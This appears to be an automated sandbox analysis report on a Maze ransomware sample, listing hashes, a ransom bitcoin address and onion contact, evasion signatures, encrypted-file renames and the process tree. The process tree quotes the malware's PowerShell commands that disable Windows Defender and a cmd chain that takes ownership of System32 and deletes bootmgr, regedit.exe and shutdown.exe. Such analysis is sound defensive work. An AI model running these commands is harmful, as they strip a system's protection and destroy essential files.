Analysis
-
max time kernel
137s -
max time network
139s -
platform
windows7_x64 -
resource
win7-en -
submitted
05-09-2021 05:02
Static task
static1
Behavioral task
behavioral1
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win7-en
General
-
Target
b53415f6_lcvDB3iF4J.exe
-
Size
7.4MB
-
MD5
b53415f6d38ce4831cbf327daf5201b4
-
SHA1
778d6f976e10d201903c76adcd18f14e685a3704
-
SHA256
4efcc256493c1c7d8f695bee676beab4aaf3d3d1e1847cf8462c38af1107b7b8
-
SHA512
0c2e2fd8ebfe175dc844d64ad9e85f8ab23f8e63b75d7773a38bf68741071c0ea6aa91402b1ab5813a7d66b289650b1e868c56dd86636dcc26c37c07bdb55bb4
Malware Config
Extracted
C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
pid Process 1652 VSSVC.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\SearchSet.raw => C:\Users\Admin\Pictures\SearchSet.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\SkipPush.raw => C:\Users\Admin\Pictures\SkipPush.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\TracePush.crw => C:\Users\Admin\Pictures\TracePush.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\WriteGet.crw => C:\Users\Admin\Pictures\WriteGet.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ConvertFromUse.png => C:\Users\Admin\Pictures\ConvertFromUse.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\GetMount.raw => C:\Users\Admin\Pictures\GetMount.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\GetSync.png => C:\Users\Admin\Pictures\GetSync.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ResolvePush.crw => C:\Users\Admin\Pictures\ResolvePush.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 1608 takeown.exe 1144 takeown.exe 1080 icacls.exe 1684 takeown.exe 1528 icacls.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe -
Loads dropped DLL 1 IoCs
pid Process 1984 b53415f6_lcvDB3iF4J.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 1080 icacls.exe 1684 takeown.exe 1528 icacls.exe 1608 takeown.exe 1144 takeown.exe -
resource yara_rule behavioral1/memory/1984-54-0x0000000001000000-0x0000000001001000-memory.dmp themida behavioral1/files/0x0002000000012f10-65.dat themida behavioral1/files/0x0002000000012f10-67.dat themida behavioral1/memory/1652-71-0x0000000000070000-0x0000000000071000-memory.dmp themida behavioral1/memory/632-75-0x0000000002420000-0x000000000306A000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1984 b53415f6_lcvDB3iF4J.exe 1652 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1476 powershell.exe 1560 powershell.exe 544 powershell.exe 632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 1984 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 1984 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe Token: SeDebugPrivilege 544 powershell.exe Token: SeDebugPrivilege 1652 VSSVC.exe Token: SeDebugPrivilege 1652 VSSVC.exe Token: SeTakeOwnershipPrivilege 1144 takeown.exe Token: SeTakeOwnershipPrivilege 1684 takeown.exe Token: SeTakeOwnershipPrivilege 1608 takeown.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1984 wrote to memory of 1476 1984 b53415f6_lcvDB3iF4J.exe 26 PID 1984 wrote to memory of 1476 1984 b53415f6_lcvDB3iF4J.exe 26 PID 1984 wrote to memory of 1476 1984 b53415f6_lcvDB3iF4J.exe 26 PID 1984 wrote to memory of 1476 1984 b53415f6_lcvDB3iF4J.exe 26 PID 1984 wrote to memory of 1560 1984 b53415f6_lcvDB3iF4J.exe 27 PID 1984 wrote to memory of 1560 1984 b53415f6_lcvDB3iF4J.exe 27 PID 1984 wrote to memory of 1560 1984 b53415f6_lcvDB3iF4J.exe 27 PID 1984 wrote to memory of 1560 1984 b53415f6_lcvDB3iF4J.exe 27 PID 1984 wrote to memory of 632 1984 b53415f6_lcvDB3iF4J.exe 29 PID 1984 wrote to memory of 632 1984 b53415f6_lcvDB3iF4J.exe 29 PID 1984 wrote to memory of 632 1984 b53415f6_lcvDB3iF4J.exe 29 PID 1984 wrote to memory of 632 1984 b53415f6_lcvDB3iF4J.exe 29 PID 1984 wrote to memory of 544 1984 b53415f6_lcvDB3iF4J.exe 31 PID 1984 wrote to memory of 544 1984 b53415f6_lcvDB3iF4J.exe 31 PID 1984 wrote to memory of 544 1984 b53415f6_lcvDB3iF4J.exe 31 PID 1984 wrote to memory of 544 1984 b53415f6_lcvDB3iF4J.exe 31 PID 1984 wrote to memory of 1652 1984 b53415f6_lcvDB3iF4J.exe 34 PID 1984 wrote to memory of 1652 1984 b53415f6_lcvDB3iF4J.exe 34 PID 1984 wrote to memory of 1652 1984 b53415f6_lcvDB3iF4J.exe 34 PID 1984 wrote to memory of 1652 1984 b53415f6_lcvDB3iF4J.exe 34 PID 1652 wrote to memory of 1460 1652 VSSVC.exe 40 PID 1652 wrote to memory of 1460 1652 VSSVC.exe 40 PID 1652 wrote to memory of 1460 1652 VSSVC.exe 40 PID 1652 wrote to memory of 1460 1652 VSSVC.exe 40 PID 1460 wrote to memory of 1144 1460 cmd.exe 42 PID 1460 wrote to memory of 1144 1460 cmd.exe 42 PID 1460 wrote to memory of 1144 1460 cmd.exe 42 PID 1460 wrote to memory of 1144 1460 cmd.exe 42 PID 1460 wrote to memory of 1080 1460 cmd.exe 43 PID 1460 wrote to memory of 1080 1460 cmd.exe 43 PID 1460 wrote to memory of 1080 1460 cmd.exe 43 PID 1460 wrote to memory of 1080 1460 cmd.exe 43 PID 1460 wrote to memory of 1684 1460 cmd.exe 44 PID 1460 wrote to memory of 1684 1460 cmd.exe 44 PID 1460 wrote to memory of 1684 1460 cmd.exe 44 PID 1460 wrote to memory of 1684 1460 cmd.exe 44 PID 1460 wrote to memory of 1528 1460 cmd.exe 45 PID 1460 wrote to memory of 1528 1460 cmd.exe 45 PID 1460 wrote to memory of 1528 1460 cmd.exe 45 PID 1460 wrote to memory of 1528 1460 cmd.exe 45 PID 1460 wrote to memory of 1608 1460 cmd.exe 46 PID 1460 wrote to memory of 1608 1460 cmd.exe 46 PID 1460 wrote to memory of 1608 1460 cmd.exe 46 PID 1460 wrote to memory of 1608 1460 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1144
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-